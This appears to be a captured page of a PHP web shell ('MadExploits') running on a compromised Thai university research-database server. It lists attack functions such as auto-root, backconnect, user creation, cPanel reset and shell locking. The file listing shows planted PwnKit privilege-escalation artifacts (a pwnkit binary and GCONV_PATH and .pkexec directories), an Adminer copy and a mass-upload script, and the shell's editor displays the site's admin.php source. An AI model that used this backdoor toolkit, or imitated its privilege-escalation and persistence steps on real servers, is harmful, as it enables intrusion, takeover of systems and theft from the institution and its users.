Linux webstaff 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64
nginx/1.22.1
: 202.29.57.4 | : 216.73.216.61
Cant Read [ /etc/named.conf ]
8.4.15
web2
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
clients /
client2 /
web2 /
web /
ris /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
_test
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
mods
[ DIR ]
drwxr-xr-x
pics
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_config.php
247
B
-rw-r--r--
_json.php
747
B
-rw-r--r--
_lib.php
1.06
KB
-rw-r--r--
action.php
602
B
-rw-r--r--
admin.php
4.42
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
ajax.php
1.08
KB
-rw-r--r--
areas_of_operation.php
11.18
KB
-rw-r--r--
areas_of_operation_test.php
11.18
KB
-rw-r--r--
footer.php
265
B
-rw-r--r--
inde-4.php
871.03
KB
-rw-r--r--
index.php
11.8
KB
-rw-r--r--
index1.php
11.98
KB
-rw-r--r--
innovation_find.php
11.56
KB
-rw-r--r--
innovation_fox.php
584
B
-rw-r--r--
innovations.php
13.44
KB
-rw-r--r--
localhost.sql
1.8
MB
-rw-r--r--
publication_find.php
11.87
KB
-rw-r--r--
publications.php
21.83
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
research_find.php
10.06
KB
-rw-r--r--
research_view.php
8.06
KB
-rw-r--r--
researcher_faculty.php
9.87
KB
-rw-r--r--
researcher_find.php
9.52
KB
-rw-r--r--
researcher_info.php
13.07
KB
-rw-r--r--
researchers.php
15.65
KB
-rw-r--r--
researches.php
16.27
KB
-rw-r--r--
scan.php
0
B
-rw-r--r--
tenka.massupload.v1.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin.php
<?php include "_lib.php"; $mod = $g_util->getParam('mod', 'login_frm'); if ($_SESSION['ss_ris_id'] == '' && $mod != 'login_frm') { $g_util->forwardPage('admin.php'); exit(); } $is_login = false; if ($_SESSION['ss_ris_id']>0) { $is_login = true; } $sql = "SELECT * FROM admin WHERE id='".$_SESSION['ss_ris_id']."' "; $ris_admin = $g_db->getObject($sql); ?> <!DOCTYPE html> <html lang="en"> <head> <title>ระบบสาระสนเทศงานวิจัย สถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏศรีสะเกษ </title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" type="image/x-icon" href="images/logo.ico"> <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"> <link rel="stylesheet" href="includes/font-awesome/css/font-awesome.min.css"> <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Sans+Thai&display=swap"> <style> body,h1,h2,h3,h4,h5 {font-family: 'Noto Sans Thai', sans-serif;} body {font-size:16px; background-color: #EEEEEE;} *{margin: 0; padding: 0; box-sizing: border-box; list-style: none; text-decoration: none; font-family: 'Noto Sans Thai', sans-serif;} .w3-half img{margin-bottom:-6px;margin-top:16px;opacity:0.8;cursor:pointer} .w3-half img:hover{opacity:1} .ris-dark {background-color:#232659; color:#FFF;} .ris-light {background-color:#f4c213; color:#232659} .ris-hover:hover {background-color:#f4c213!important; color:#232659!important;} .ris-active {background-color:#f4c213; color:#232659;!important} .ris-icon {color:#232659!important;} .ris-icon-hover:hover {color:#880000!important;} </style> </head> <body> <?php if ($is_login) { ?> <div class="w3-bar w3-border ris-dark"> <a href="admin.php?mod=researcher_lst" class="w3-bar-item w3-button<?=(strpos($mod, 'researcher_') !== false)?' ris-light':''?>"><i class="fa fa-address-book-o" aria-hidden="true"></i> นักวิจัย</a> <a href="admin.php?mod=research_lst" class="w3-bar-item w3-button<?=(strpos($mod, 'research_') !== false)?' ris-light':''?>"><i class="fa fa-archive" aria-hidden="true"></i> งานวิจัย</a> <a href="admin.php?mod=publication_lst" class="w3-bar-item w3-button<?=(strpos($mod, 'publication_') !== false)?' ris-light':''?>"><i class="fa fa-newspaper-o" aria-hidden="true"></i> การตีพิมพ์</a> <a href="admin.php?mod=innovation_lst" class="w3-bar-item w3-button<?=(strpos($mod, 'innovation_') !== false)?' ris-light':''?>"><i class="fa fa-cogs" aria-hidden="true"></i> นวัตกรรมและสิ่งประดิษฐ์</a> <!--a href="admin.php?mod=journal_lst" class="w3-bar-item w3-button<?=(strpos($mod, 'journal_') !== false)?' ris-light':''?>"><i class="fa fa-book" aria-hidden="true"></i> แหล่งตีพิมพ์</a--> <a href="admin.php?mod=fund_lst" class="w3-bar-item w3-button<?=(strpos($mod, 'fund_') !== false)?' ris-light':''?>"><i class="fa fa-money" aria-hidden="true"></i> แหล่งทุน</a> <a href="admin.php?mod=publishdb_lst" class="w3-bar-item w3-button<?=(strpos($mod, 'publishdb_') !== false)?' ris-light':''?>"><i class="fa fa-university" aria-hidden="true"></i> ฐานข้อมูลตีพิมพ์</a> <a href="admin.php?mod=faculty_lst" class="w3-bar-item w3-button<?=(strpos($mod, 'faculty_') !== false)?' ris-light':''?>"><i class="fa fa-sitemap" aria-hidden="true"></i> ชื่อคณะ</a> <?php if ($ris_admin->level == '1') { ?> <a href="admin.php?mod=admin_lst" class="w3-bar-item w3-button<?=(strpos($mod, 'admin_') !== false)?' ris-light':''?>"><i class="fa fa-user-secret" aria-hidden="true"></i> ผู้ดูแลระบบ</a> <?php } ?> <a href="action.php?mod=login_act&do=logout" class="w3-bar-item w3-button w3-red w3-right"><i class="fa fa-sign-out" aria-hidden="true"></i> Sign out</a> </div> <?php } ?> <!-- !PAGE CONTENT! --> <form id="frm_main" name="frm_main" enctype="multipart/form-data" method="POST" action="<?=(substr($mod, -3)=='frm')?'action':'admin'?>.php" enctype="multipart/form-data" class="w3-container w3-left-align"> <?php $mod_path = "mods/".$mod.".php"; if (is_file($mod_path)) { include($mod_path); } ?> </form> </div> </body> </html> <?php $g_db->close(); ?>
Close